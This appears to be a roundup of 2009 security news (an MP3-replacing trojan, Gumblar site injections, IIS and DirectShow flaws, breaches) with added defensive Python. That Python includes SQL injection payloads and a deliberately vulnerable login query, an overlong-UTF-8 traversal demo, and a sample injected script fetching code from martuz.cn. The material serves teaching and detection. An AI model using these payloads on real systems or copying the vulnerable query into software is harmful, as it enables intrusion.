A new piece of malware attempts to stop music piracy, which incidentally seems to be on the rise lately because of the economic downturn.
It looks to have been written by some Indonesian script kiddies who seem to think that by infecting people’s computers they can stop piracy.
The malware uses the Indonesian band Samsons and their song Naluri Lelaki as bait to entice users to click on the file. The file carries a Winamp icon, so it looks like a regular MP3 file to the user. When run, it modifies registry entries related to Winlogon so that the victim’s computer displays the following message box before they can log on: “Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!”. This loosely translates to: “Stop pirating our country’s musicians, don’t use MP3s any more (acting all high and mighty) huahahahahaha!!!”
The Trojan replaces every MP3 it finds on the victim’s computer with a copy of itself named after the original file with “.exe” appended (so name.mp3 becomes name.mp3.exe), thus destroying all MP3 files on the system.
The Trojan also shuts down Winamp and copies itself to the Windows folder on the victim’s computer as winamp.dll.exe. The following registry value is created to run it at startup:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    ServiceOptionMP3 = <Windows>\winamp.dll.exe
The following value is set, disabling the registry editor (regedit):
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableRegistryTools = 1
Further registry values are set as follows:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableRegedit = 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoFolderOptions = 1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    LegalNoticeCaption = STOP PIRACY!!!!
    LegalNoticeText = Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!
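As an added example (not part of the SophosLabs write-up), the following Python script audits a registry export in .reg format for the indicators listed above: a Run entry that launches a double-extension executable, the regedit and Folder Options lockout policies, and a Winlogon legal notice. The sample export is constructed for this example, and the ctfmon.exe entry in it stands in for a legitimate autorun. Note that LegalNoticeCaption and LegalNoticeText are also set legitimately by organisations that display a logon banner, so that finding needs its text reviewed, whereas a .dll.exe autorun is suspicious on its own.

```python
import re

# Constructed sample: a .reg-format export populated with the keys and values the
# write-up lists, plus one ordinary Run entry (ctfmon.exe) as a benign control.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"ServiceOptionMP3"="C:\\WINDOWS\\winamp.dll.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
"DisableRegedit"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"LegalNoticeCaption"="STOP PIRACY!!!!"
"LegalNoticeText"="Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!"
'''

_KEY_RE = re.compile(r'^\[(.+)\]$')
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)+)"=(.*)$')


def _decode_value(raw):
    """Decode the two value syntaxes used above; other types are returned raw."""
    raw = raw.strip()
    if raw.lower().startswith('dword:'):
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return raw


def parse_reg_export(text):
    """Return {key_path_lowercased: {value_name: value}} from a .reg export.
    Key paths are lower-cased because the registry is case-insensitive."""
    reg, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('Windows Registry Editor') or line == 'REGEDIT4':
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            reg.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            reg[current][m.group(1)] = _decode_value(m.group(2))
    return reg


# Locations from the write-up (HKCU/HKLM expanded to their full hive names).
RUN_KEYS = (
    r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run',
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
)
POLICY_SYSTEM = r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System'
POLICY_EXPLORER = r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
WINLOGON = r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
LOCKOUT_FLAGS = (
    (POLICY_SYSTEM, 'DisableRegistryTools'),
    (POLICY_SYSTEM, 'DisableRegedit'),
    (POLICY_EXPLORER, 'NoFolderOptions'),
)
# A library, media or document extension immediately followed by .exe (winamp.dll.exe).
_DOUBLE_EXT_RE = re.compile(r'\.(dll|mp3|jpg|jpeg|gif|txt|doc|pdf)\.exe\b', re.IGNORECASE)


def audit(reg):
    """Return human-readable findings for the indicators described in the write-up."""
    findings = []
    for key in RUN_KEYS:
        for name, command in reg.get(key.lower(), {}).items():
            if isinstance(command, str) and _DOUBLE_EXT_RE.search(command):
                findings.append(f'autorun with double extension: {name} -> {command}')
    for key, name in LOCKOUT_FLAGS:
        if reg.get(key.lower(), {}).get(name) == 1:
            findings.append(f'lockout policy set: {name}=1')
    for name in ('LegalNoticeCaption', 'LegalNoticeText'):
        text = reg.get(WINLOGON.lower(), {}).get(name)
        if text:  # legitimate logon banners set this too; review the text
            findings.append(f'logon banner set: {name}={text!r}')
    return findings


if __name__ == '__main__':
    for finding in audit(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(finding)
```

On a live machine the same checks can be run against an export produced with `reg export` for each hive, or by reading the keys directly; the export form is used here so the script runs anywhere.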
Credit: Prashant Kumar, SophosLabs
An infection that attempts to install a potent malware cocktail on the machines of end users has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday.
The infection sneaks malicious JavaScript onto the front page of websites, most likely through SQL injection against a widely used web application, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script and is obfuscated, so it is hard to spot.
The malicious payload silently redirects visitors of infected sites to servers that fingerprint the end user’s PC. Based on the results, it attempts to exploit one or more of about 10 different unpatched vulnerabilities on the visitor’s machine. If none is present, the web server serves a pop-up window claiming the PC is infected, in an attempt to trick the person into installing rogue anti-virus software. The dropped executable has a very low AV detection rate.
The rogue anti-virus software is polymorphic: it constantly alters its binary so that the signature-based detection used by the vast majority of legitimate anti-virus programs misses it. Because the JavaScript is obfuscated, it is likewise hard for anti-virus programs to detect, and it cannot be found with Google searches that scour the web for a common string or variable name.
According to Chenette, “For the common user, it’s going to be possible but difficult to determine what the code is doing or if it’s indeed malicious. We can see this quickly growing.”
The infection shares many similarities with a mass website malady that’s been dubbed Gumblar. It too injects obfuscated javascript into legitimate websites in an attempt to attack visitors. So far, it’s spread to about 60,000 sites, Websense estimates.
Several differences in the way the javascript behaves, however, have led Websense researchers to believe the two attacks are unrelated.
The researchers have also noticed that the code, once it’s deobfuscated, points to web addresses that are misspellings of legitimate Google Analytics domains that many sites use to track visitor statistics. The RBN, or Russian Business Network, has used similar tactics in the past, and Websense is now working to determine whether those responsible for this latest attack have ties to that criminal outfit.
“It could be that the RBN is related, or more likely because that code was publicized, the attackers are acting in a very smart fashion to duplicate methods of old attacks to hide their tracks,” Chenette explained.
Credit: The Register
A corporate identity theft ring that exploited the identities of local corporations, religious institutions, hospitals and even schools to run a cheque fraud scam has been busted in New York.
Investigators reckon the gang of 18 suspects made millions by impersonating workers from an estimated 350 New York-based organizations. Data purchased from corrupt bank insiders was used to lay the groundwork for the scam, which relied on cashing thousands of counterfeit payroll cheques. The fraudsters also plundered the bank accounts of individual victims, using data obtained from the same insiders to transfer funds to accounts under the gang’s control.
Mules were recruited as payees on the counterfeit cheques, which were forged using scanners, cheque stock, magnetic ink, company logos and specialist software. The scam ran between October 2007 and February 2009. One bank alone lost $1.4m through the scam.
The gang was led by alleged masterminds Jasper Grayson, 25, and James Malloy, 26, according to an indictment unsealed this week. Renece Razor, a former teller at a JP Morgan Chase Bank branch in Manhattan, Ilaura Walker, a former worker at a TD Bank branch in Manhattan, and Keisha Polonio, a former clerk at an HSBC Bank branch in the Bronx, are all charged with stealing the personal data of identity theft victims before supplying the details to other members of the gang.
Police are investigating the possible involvement of other suspected bank workers in the scam as part of the ongoing investigation.
Credit: The Register
A known computer hacking clan with anti-American leanings has successfully broken into at least two sensitive Web servers maintained by the U.S. Army, InformationWeek has learned exclusively.
Department of Defense and other investigators are currently probing the breaches, which have not been publicly disclosed. Investigators have subpoenaed records from Google, Microsoft, and Yahoo in connection with the ongoing probe.
The hackers, who are based in Turkey, penetrated servers at the Army’s McAlester Ammunition Plant in McAlester, Okla., and at the U.S. Army Corps of Engineers’ Transatlantic Center in Winchester, Va.
The breach at the McAlester munitions plant occurred on Jan. 26, according to records of the investigation obtained by InformationWeek. On that date, Web users attempting to access the plant’s site were redirected to a Web page that featured a protest against climate change.
On Sept. 19, 2007, the same hackers electronically broke into Army Corps of Engineers’ servers. That hack sent Web users to another page, which at the time, contained anti-American and anti-Israeli rhetoric and images. It currently appears to be an Internet landing spot that features airline reservation links.
Beyond the redirects, it’s not clear whether the group was able to obtain sensitive information from the Army’s servers.
The hacks are the subject of an ongoing criminal investigation by Defense Department officials and members of the U.S. Army’s Judge Advocate General’s Office and Computer Emergency Response Team. Investigators have executed records search warrants against Microsoft, Yahoo, Google, and other Internet service and e-mail providers as part of their efforts to unmask the hackers’ true identities.
Investigators believe the hackers used SQL injection against the sites’ Microsoft SQL Server-backed web applications to gain entry to the Web servers. (SQL injection exploits an application’s failure to keep user input separate from query code, not a flaw in the database engine itself; the same technique works against any database the application queries with concatenated strings.) The group is known to have carried out similar attacks on a number of other Web sites in the past — including against a site maintained by Internet security company Kaspersky Lab.
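To make the technique concrete, here is an added example (not from the InformationWeek report and not the code of any site involved) showing the query shape that makes SQL injection possible beside the parameterised form that prevents it. It uses Python’s bundled SQLite as a stand-in for SQL Server, because both accept the same quoting and `--` comment syntax and the logic flaw is identical; the user table and the payloads are constructed for the demonstration.

```python
import sqlite3


def make_demo_db():
    """In-memory table standing in for an application's user store (constructed
    sample data; real systems store password hashes, which does not change the
    query-shape problem shown here)."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (username TEXT, password TEXT, role TEXT)')
    conn.executemany('INSERT INTO users VALUES (?, ?, ?)', [
        ('alice', 'correct horse', 'admin'),
        ('bob', 'battery staple', 'user'),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so quote characters in the input
    change the statement's structure instead of being compared as data."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Sends the statement and the values separately; the driver binds the values
    as data, so the same payloads are compared literally and match nothing."""
    sql = 'SELECT username, role FROM users WHERE username = ? AND password = ?'
    return conn.execute(sql, (username, password)).fetchall()


# Constructed payloads: comment out the password check, or make WHERE always true.
PAYLOAD_COMMENT = "alice' --"
PAYLOAD_TAUTOLOGY = "' OR '1'='1"

if __name__ == '__main__':
    db = make_demo_db()
    print(login_vulnerable(db, PAYLOAD_COMMENT, 'wrong'))             # alice, no password
    print(login_vulnerable(db, PAYLOAD_TAUTOLOGY, PAYLOAD_TAUTOLOGY))  # every row
    print(login_parameterized(db, PAYLOAD_COMMENT, 'wrong'))          # []
```

The defence is the same against SQL Server: parameterised statements (or stored procedures invoked with bound parameters) everywhere user input reaches a query, combined with a low-privilege database account for the web application so that a remaining injection point cannot reach beyond the application’s own tables.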
The hacks are troubling in that they appear to have rendered useless supposedly sophisticated Defense Department tools and procedures designed to prevent such breaches. The department and its branches spend millions of dollars each year on pricey security and antivirus software and employ legions of experts to deploy and manage the tools.
Equally troubling is the fact that the hacks appear to have originated outside the United States. Turkey is known to harbor significant elements of the al-Qaida network. It was not clear if the hackers have links to the terrorist group.
Credit: Paul McDougall, InformationWeek
Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.
The company has activated its security response process to deal with the zero-day attacks and has issued a pre-patch advisory with workarounds and a one-click “Fix it” feature that enables the mitigation.
From the advisory:
Microsoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.
According to the MSRC blog, the vulnerability is in the QuickTime parser in Microsoft DirectShow. An attacker would try to exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn’t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we’ve verified that it is possible to direct calls to DirectShow specifically, even if Apple’s QuickTime (which is not vulnerable) is installed.
The vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.
Users of the vulnerable Windows versions should consider disabling QuickTime parsing immediately to thwart attackers. The article at http://support.microsoft.com/kb/971778 provides a Fix it button that applies the workaround automatically, along with detailed instructions for deploying it by script in managed Windows environments.
Credit: ZDNet.com Security Blogs
Research In Motion (RIM) has warned of a vulnerability in how BlackBerry servers handle malformed PDF files that potentially leaves the door open to hacking attacks.
If corporate users of BlackBerry mobile devices are tricked into opening an email message with a booby-trapped PDF attachment, it might be possible to inject hostile code onto a vulnerable server running the BlackBerry Attachment Service, RIM warns.
BlackBerry Enterprise Server software version 4.1 Service Pack 3 (4.1.3) through 5.0 and BlackBerry Professional Software 4.1 Service Pack 4 (4.1.4) are affected. RIM has issued an interim security software update, as explained in an advisory which can be found at www.blackberry.com.
The Canadian firm is also advising customers to disable PDF file processing on the BlackBerry server, as a workaround, pending the application of a more complete fix.
The incident is far from unprecedented, but it underlines the threat unpatched PDF and Microsoft Office applications increasingly pose to corporate security, beyond the better-known threats posed by unpatched browser applications.
Credit: The Register
A lost laptop containing the personal data of 109,000 Pensions Trust members has sparked the latest in a growing list of information security breach alerts.
The missing machine was stolen from the offices of NorthgateArinso, suppliers of the Pensions Trust’s computerised pensions administration system, where it was being used “as a database for development, training and performance testing”.
Data on the drive was not encrypted, only password protected - which provides little reassurance, since a logon password does not protect data on a disk that can be removed or booted from other media. Data held on the laptop included name, address, date of birth, NI number, name of employer, salary details, name of and relationship to nominees and, for those drawing a pension, bank account details.
Members of six of the Pensions Trust’s 39 schemes were affected by the breach. The records potentially exposed dated from May 2007.
The Pensions Trust sent out letters this week informing affected members that their personal details have potentially been exposed as a result of the breach.
Credit: The Register
The FBI and the US Marshals had to partially shut down their networks yesterday after they were hit by a computer virus.
According to the AP, the US Marshals’ computer problems began Thursday morning, while the FBI had begun experiencing similar problems earlier. The US Marshals’ systems were disconnected to protect the main US Justice Department network from potential infection.
Various sources say that the virus might be the Neeris worm and that the problem was likely caused by the US Marshals Service running out-of-date anti-virus software, Trend Micro’s OfficeScan version 5.0, and not applying patches to its computers.
Trend Micro says protection against the Neeris malware has been in OfficeScan ever since version 8. The current version is 10, but for some reason the US Marshals have not upgraded the software.
It was not as if they were short of a few dollars: the silly federal coppers had paid for the upgrades but simply had not installed them.
Credit: The Inquirer
Hackers have wasted no time targeting a gaping hole in Microsoft’s Internet Information Services webserver, according to administrators at Ball State University, who say servers that used the program were breached on Monday.
As of Wednesday morning California time, iWeb accounts at the Muncie, Indiana-based university remained inaccessible, and service wasn’t expected to be restored until Thursday or Friday, Patty Lucas, a senior help desk support admin for Ball State’s Computing Services, said. University administrators were working with Microsoft employees to investigate and fix the break-in.
Microsoft representatives were investigating the breach Wednesday morning and not immediately available to comment on it.
On Monday, Microsoft confirmed what it called an “elevation of privilege vulnerability” in versions 5 and 6 of IIS when it runs an extension known as WebDAV. Microsoft said at the time it was unaware of any in-the-wild exploits of the vulnerability. That assessment was at odds with a warning from the US Computer Emergency Readiness Team (US-CERT), which said it was aware of “publicly available exploit code and active exploitation of this vulnerability.”
The flaw is significant because it allows anyone with a web browser to list, access, and possibly upload files in a password-protected WebDAV folder on a vulnerable machine, according to Nikolaos Rangos, a security researcher who published his findings on Friday. The bug resides in the part of IIS that processes commands based on the WebDAV protocol.
By inserting “%c0%af” into a web address, attackers can trick the widely used web server into accessing parts of the system that are supposed to be off limits to outsiders. The sequence is a percent-encoded overlong UTF-8 form of the “/” character: the byte pair C0 AF encodes the slash in two bytes where the standard requires one, so a strict decoder rejects it while a lenient one silently turns it into “/”.
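The “%c0%af” detail is worth working through in code. The Python below is an added example, not code from the article or from IIS: it implements a lenient UTF-8 decoder that accepts the overlong two-byte form, then contrasts a simplified request handler that applies its access check before decoding (an assumed model of the bug class, not IIS’s actual logic) with one that decodes strictly, canonicalises the path, and only then checks it. The protected prefix and request paths are constructed for the demonstration.

```python
import posixpath
from urllib.parse import unquote_to_bytes


def lax_utf8_decode(data):
    """Lenient decoder: accepts the overlong two-byte form, so C0 AF -> '/'.
    Only the two-byte case is hand-rolled; longer forms use the strict decoder."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF:
            if i + 1 >= len(data) or not 0x80 <= data[i + 1] <= 0xBF:
                raise ValueError('truncated or malformed two-byte sequence')
            # Lead bytes C0 and C1 are never valid UTF-8, but this decoder does not check.
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            n = 3 if b < 0xF0 else 4
            out.append(data[i:i + n].decode('utf-8'))
            i += n
    return ''.join(out)


def is_protected(path, protected):
    return any(path == p or path.startswith(p + '/') for p in protected)


def authorize_then_decode(url_path, protected, decoder=lax_utf8_decode):
    """Assumed model of the flaw: the access check runs on the percent-decoded
    bytes, and UTF-8 decoding plus '..' resolution happen afterwards."""
    raw = unquote_to_bytes(url_path)
    if is_protected(raw.decode('latin-1'), protected):
        return 'denied'
    resolved = posixpath.normpath(decoder(raw))
    return 'served ' + resolved


def decode_then_authorize(url_path, protected):
    """Hardened order: strict UTF-8 decode (rejects overlong forms), canonicalise,
    then apply the access check to the path that will actually be used."""
    raw = unquote_to_bytes(url_path)
    try:
        text = raw.decode('utf-8')
    except UnicodeDecodeError as exc:
        return 'rejected (' + exc.reason + ')'
    resolved = posixpath.normpath(text)
    if is_protected(resolved, protected):
        return 'denied'
    return 'served ' + resolved


PROTECTED = ['/protected']
# Constructed request paths for the demonstration.
PLAIN = '/protected/secret.txt'
OVERLONG = '/..%c0%afprotected/secret.txt'   # leniently decodes to /../protected/secret.txt

if __name__ == '__main__':
    print(repr(lax_utf8_decode(b'\xc0\xaf')))           # '/'
    print(authorize_then_decode(PLAIN, PROTECTED))     # denied
    print(authorize_then_decode(OVERLONG, PROTECTED))  # served /protected/secret.txt
    print(decode_then_authorize(OVERLONG, PROTECTED))  # rejected (invalid start byte)
```

Two lessons carry over to any server or filter: decode and canonicalise completely before making the authorisation decision, and treat a non-shortest-form UTF-8 sequence as an error rather than as the character it spells.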
Microsoft’s advisory correctly points out that several conditions make the vulnerability hard to exploit in some cases. For one, WebDAV is not enabled by default in IIS6, and for another, intruders would not be able to exceed the privileges of an anonymous user. By default, such accounts are not permitted to upload files to a server.
But based on Lucas’s description, the Ball State hackers may have been able to do just that. Shortly after the attack, students checking their iWeb pages were greeted with a message that said they had been hacked. There are no indications any data was stolen or malicious files uploaded, she said.
Credit: The Register
Update (May 22): Network administrators at Ball State University have retracted their claims that a campus website was brought down by a zero-day vulnerability in Microsoft’s Internet Information Services webserver.
“Microsoft and Ball State now have identified the cause of the breach [as] a Ball State iWeb user [who] either misused or allowed the misuse of their account, and that was determined just this afternoon,” Ball State University spokesman Tony Proudfoot said on Thursday.
A Web attack that poisons Google search results is getting worse, according to security researchers.
The attack first relies on compromising normally legitimate websites and planting malicious scripts on them. US-CERT reports that stolen FTP credentials are reckoned to be the main technique in play during this stage of the attack, but poor configuration settings and vulnerable web applications might also play a part.
Surfers who visit compromised websites are exposed to attacks that rely on well-known PDF and Flash Player vulnerabilities to plant malware onto Windows PCs.
This malware is designed to redirect Google search results as well as to swipe sensitive information from compromised machines, according to early findings from ongoing analysis.
The SANS Institute’s Internet Storm Centre (ISC) adds that the attack has been around for some time but has intensified over recent days. Initially the malware was served up onto vulnerable Windows clients from the website gumblar.cn, which has been offline since Friday. A second domain - martuz.cn - has taken over this key role in the attack, ISC reports.
Web security scanning firm ScanSafe, which was among the first to warn of the rise of the attack, notes that the reference to martuz.cn in more recent attacks has been obfuscated, possibly in an attempt to thwart rudimentary blacklists. “The URI resulting from the injected script might appear as mar”+”tuz.cn instead of just martuz.cn,” writes ScanSafe researcher Mary Landesman.
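Detecting both tricks described on this page, the typosquatted Google Analytics hosts from the Websense report above and Gumblar’s split-string hostnames, comes down to the same step: normalise the script before matching it. The following Python is an added example (not code from The Register, Websense or ScanSafe): it pulls external and inline scripts out of a page, folds "mar"+"tuz.cn"-style concatenations back together, extracts hostnames, and flags those on a block list or within a small edit distance of google-analytics. The sample page and the lookalike host googie-analytics.example (in the reserved .example TLD) are constructed for the example; the block list holds only the two hosts the article names.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: a genuine Google Analytics include, a typosquatted
# analytics host in the reserved .example TLD, and an injected inline script that
# assembles the Gumblar-era hostnames from concatenated string pieces.
SAMPLE_HTML = '''<html><head>
<script src="https://www.google-analytics.com/ga.js"></script>
<script src="//googie-analytics.example/urchin.js"></script>
<script type="text/javascript">
var u = "http://" + "mar" + "tuz.cn" + "/rss/?id=1";
var fallback = 'gum' + 'blar.cn';
var s = document.createElement('scr' + 'ipt'); s.src = u; document.body.appendChild(s);
</script>
</head><body>hello</body></html>'''

BLOCKLIST = {'gumblar.cn', 'martuz.cn'}                 # hosts named in the article
LEGIT_ANALYTICS = {'www.google-analytics.com', 'ssl.google-analytics.com'}
PROTECTED_LABEL = 'google-analytics'                     # second-level label to watch
REASON_BLOCKLIST = 'blocklisted domain'
REASON_LOOKALIKE = 'lookalike of google-analytics'
_NOT_TLDS = {'js', 'css', 'htm', 'html', 'php', 'png', 'gif', 'jpg'}


class _ScriptCollector(HTMLParser):
    """Gathers external script URLs and the full text of each inline script."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            src = dict(attrs).get('src')
            if src:
                self.srcs.append(src)
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)     # may arrive in chunks; joined at </script>

    def handle_endtag(self, tag):
        if tag == 'script' and self._buf is not None:
            self.inline.append(''.join(self._buf))
            self._buf = None


def collapse_concat(js):
    """Fold adjacent string literals joined with '+' ("mar"+"tuz.cn" -> "martuz.cn")."""
    prev = None
    while prev != js:
        prev = js
        js = re.sub(r'"([^"]*)"\s*\+\s*"([^"]*)"', r'"\1\2"', js)
        js = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", js)
    return js


_URL_HOST_RE = re.compile(r'(?:https?:)?//([a-z0-9][a-z0-9.-]*\.[a-z]{2,})', re.I)
_BARE_HOST_RE = re.compile(r'''["']([a-z0-9-]+(?:\.[a-z0-9-]+)+)["']''', re.I)


def hosts_in(text):
    """Hostnames from URLs plus quoted bare domain literals, lower-cased and sorted."""
    hosts = {h.lower() for h in _URL_HOST_RE.findall(text)}
    for h in _BARE_HOST_RE.findall(text):
        if h.rsplit('.', 1)[-1].lower() not in _NOT_TLDS:
            hosts.add(h.lower())
    return sorted(hosts)


def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host):
    """Return a reason string if the host is suspicious, else None."""
    if host in BLOCKLIST:
        return REASON_BLOCKLIST
    if host in LEGIT_ANALYTICS:
        return None
    labels = host.split('.')
    if len(labels) >= 2 and 0 < edit_distance(labels[-2], PROTECTED_LABEL) <= 2:
        return REASON_LOOKALIKE
    return None


def scan_html(doc):
    """Return [(host, reason)] for every suspicious host referenced by scripts."""
    p = _ScriptCollector()
    p.feed(doc)
    p.close()
    texts = list(p.srcs) + [collapse_concat(js) for js in p.inline]
    findings = []
    for text in texts:
        for host in hosts_in(text):
            reason = classify(host)
            if reason:
                findings.append((host, reason))
    return findings
```

Running `scan_html(SAMPLE_HTML)` reports the lookalike host and both blocklisted hosts while leaving the genuine www.google-analytics.com include alone. The block list is the weakest layer; the concatenation folding and the lookalike check are what catch the variants the articles describe, and attackers can obfuscate further (character codes, eval of decoded strings), so a thorough deobfuscator has to evaluate the script rather than pattern-match it.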
ScanSafe reported on Monday that Gumblar more than trebled (up 246 per cent) over the preceding week. It describes Gumblar as a botnet of compromised websites in a series of blog postings on the attack. Sophos reckons the Gumblar-related malware appeared in 42 per cent of all the newly infected websites it detected last week.
Credit: The Register